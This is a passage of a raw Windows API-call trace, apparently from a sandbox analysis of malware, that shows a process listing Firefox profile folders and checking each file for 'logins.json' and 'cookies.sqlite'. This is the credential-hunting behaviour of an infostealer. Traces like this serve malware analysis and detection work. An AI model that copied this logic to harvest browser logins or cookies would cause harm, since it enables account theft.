dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.167] GetProcessHeap () returned 0x8e0000 [0161.167] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.167] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpSrch="logins.json") returned 0x0 [0161.167] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpSrch="cookies.sqlite") returned 0x0 [0161.167] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.167] GetProcessHeap () returned 0x8e0000 [0161.167] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.167] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3a63b40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="webappsstore.sqlite", cAlternateFileName="WEBAPP~1.SQL")) returned 1 [0161.167] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.167] lstrlenW (lpString="\\") returned 1 [0161.167] GetProcessHeap () returned 0x8e0000 [0161.167] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.167] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.167] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.167] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.167] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0161.167] GetProcessHeap () returned 0x8e0000 [0161.167] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd8) returned 0x924a48 [0161.168] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.168] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webappsstore.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" [0161.168] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.168] GetProcessHeap () returned 0x8e0000 [0161.168] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.168] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite", lpSrch="logins.json") returned 0x0 [0161.168] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.168] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.168] GetProcessHeap () returned 0x8e0000 [0161.168] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.168] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3a63b40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="webappsstore.sqlite", cAlternateFileName="WEBAPP~1.SQL")) returned 0 [0161.168] FindClose (in: hFindFile=0x8f9a40 | out: hFindFile=0x8f9a40) returned 1 [0161.168] VirtualQuery (in: lpAddress=0x925378, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.168] GetProcessHeap () returned 0x8e0000 [0161.168] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925378 | out: hHeap=0x8e0000) returned 1 [0161.168] VirtualQuery (in: lpAddress=0x9252c0, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.168] GetProcessHeap () returned 0x8e0000 [0161.168] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c0 | out: hHeap=0x8e0000) returned 1 [0161.168] VirtualQuery (in: lpAddress=0x926488, lpBuffer=0x2df9dc, dwLength=0x1c | out: lpBuffer=0x2df9dc*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.168] GetProcessHeap () returned 0x8e0000 [0161.168] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926488 | out: hHeap=0x8e0000) returned 1 [0161.168] lstrlenW (lpString="Profile0") returned 8 [0161.168] VirtualQuery (in: lpAddress=0x922978, lpBuffer=0x2df9dc, dwLength=0x1c | out: lpBuffer=0x2df9dc*(BaseAddress=0x922000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x26000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.168] GetProcessHeap () returned 0x8e0000 [0161.168] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x922978 | out: hHeap=0x8e0000) returned 1 [0161.168] VirtualQuery (in: lpAddress=0x912b80, lpBuffer=0x2df9dc, dwLength=0x1c | out: lpBuffer=0x2df9dc*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.168] GetProcessHeap () returned 0x8e0000 [0161.168] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b80 | out: hHeap=0x8e0000) returned 1 [0161.168] VirtualQuery (in: lpAddress=0x9263e8, lpBuffer=0x2df9dc, dwLength=0x1c | out: lpBuffer=0x2df9dc*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.168] GetProcessHeap () returned 0x8e0000 [0161.168] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9263e8 | out: hHeap=0x8e0000) returned 1 [0161.168] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df9dc, dwLength=0x1c | out: lpBuffer=0x2df9dc*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.168] GetProcessHeap () returned 0x8e0000 [0161.168] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0161.168] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.169] lstrlenW (lpString="") returned 0 [0161.169] GetProcessHeap () returned 0x8e0000 [0161.169] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7e) returned 0x926360 [0161.169] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.169] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.169] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.169] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.169] lstrlenW (lpString="*.*") returned 3 [0161.169] GetProcessHeap () returned 0x8e0000 [0161.169] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x84) returned 0x9263e8 [0161.169] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.169] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*.*" [0161.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*.*", lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9a40 [0161.169] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.169] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.169] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.169] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.169] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="Crash Reports", cAlternateFileName="CRASHR~1")) returned 1 [0161.169] lstrcmpiW (lpString1="Crash Reports", lpString2=".") returned 1 [0161.169] lstrcmpiW (lpString1="Crash Reports", lpString2="..") returned 1 [0161.169] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.169] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.169] lstrlenW (lpString="") returned 0 [0161.169] GetProcessHeap () returned 0x8e0000 [0161.169] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7e) returned 0x926478 [0161.169] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.169] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.169] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.169] lstrlenW (lpString="Crash Reports") returned 13 [0161.169] GetProcessHeap () returned 0x8e0000 [0161.169] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x98) returned 0x9252c0 [0161.169] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.170] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Crash Reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0161.170] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.170] GetProcessHeap () returned 0x8e0000 [0161.170] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0161.170] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 75 [0161.170] lstrlenW (lpString="") returned 0 [0161.170] GetProcessHeap () returned 0x8e0000 [0161.170] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x98) returned 0x926478 [0161.170] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0161.170] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0161.170] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 75 [0161.170] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 75 [0161.170] lstrlenW (lpString="\\*.*") returned 4 [0161.170] GetProcessHeap () returned 0x8e0000 [0161.170] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa0) returned 0x925360 [0161.170] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0161.170] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*.*" [0161.170] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*.*", lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0161.170] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.170] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName="..", cAlternateFileName="")) returned 1 [0161.170] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.170] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.170] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x54, dwReserved1=0x54, cFileName="InstallTime20131025151332", cAlternateFileName="INSTAL~1")) returned 1 [0161.170] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 75 [0161.170] lstrlenW (lpString="\\") returned 1 [0161.170] GetProcessHeap () returned 0x8e0000 [0161.170] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x925408 [0161.170] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0161.170] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0161.170] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 76 [0161.170] lstrlenW (lpString="InstallTime20131025151332") returned 25 [0161.170] GetProcessHeap () returned 0x8e0000 [0161.171] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.171] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0161.171] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="InstallTime20131025151332" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" [0161.171] VirtualQuery (in: lpAddress=0x925408, lpBuffer=0x2df4e0, dwLength=0x1c | out: lpBuffer=0x2df4e0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.171] GetProcessHeap () returned 0x8e0000 [0161.171] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925408 | out: hHeap=0x8e0000) returned 1 [0161.171] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpSrch="logins.json") returned 0x0 [0161.171] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpSrch="cookies.sqlite") returned 0x0 [0161.171] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.171] GetProcessHeap () returned 0x8e0000 [0161.171] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.171] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x54, dwReserved1=0x54, cFileName="InstallTime20131025151332", cAlternateFileName="INSTAL~1")) returned 0 [0161.171] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0161.171] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.171] GetProcessHeap () returned 0x8e0000 [0161.171] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0161.171] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df4ec, dwLength=0x1c | out: lpBuffer=0x2df4ec*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.171] GetProcessHeap () returned 0x8e0000 [0161.171] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0161.171] VirtualQuery (in: lpAddress=0x9252c0, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.171] GetProcessHeap () returned 0x8e0000 [0161.171] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c0 | out: hHeap=0x8e0000) returned 1 [0161.171] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.171] lstrlenW (lpString="\\") returned 1 [0161.171] GetProcessHeap () returned 0x8e0000 [0161.171] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x80) returned 0x926478 [0161.171] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.171] 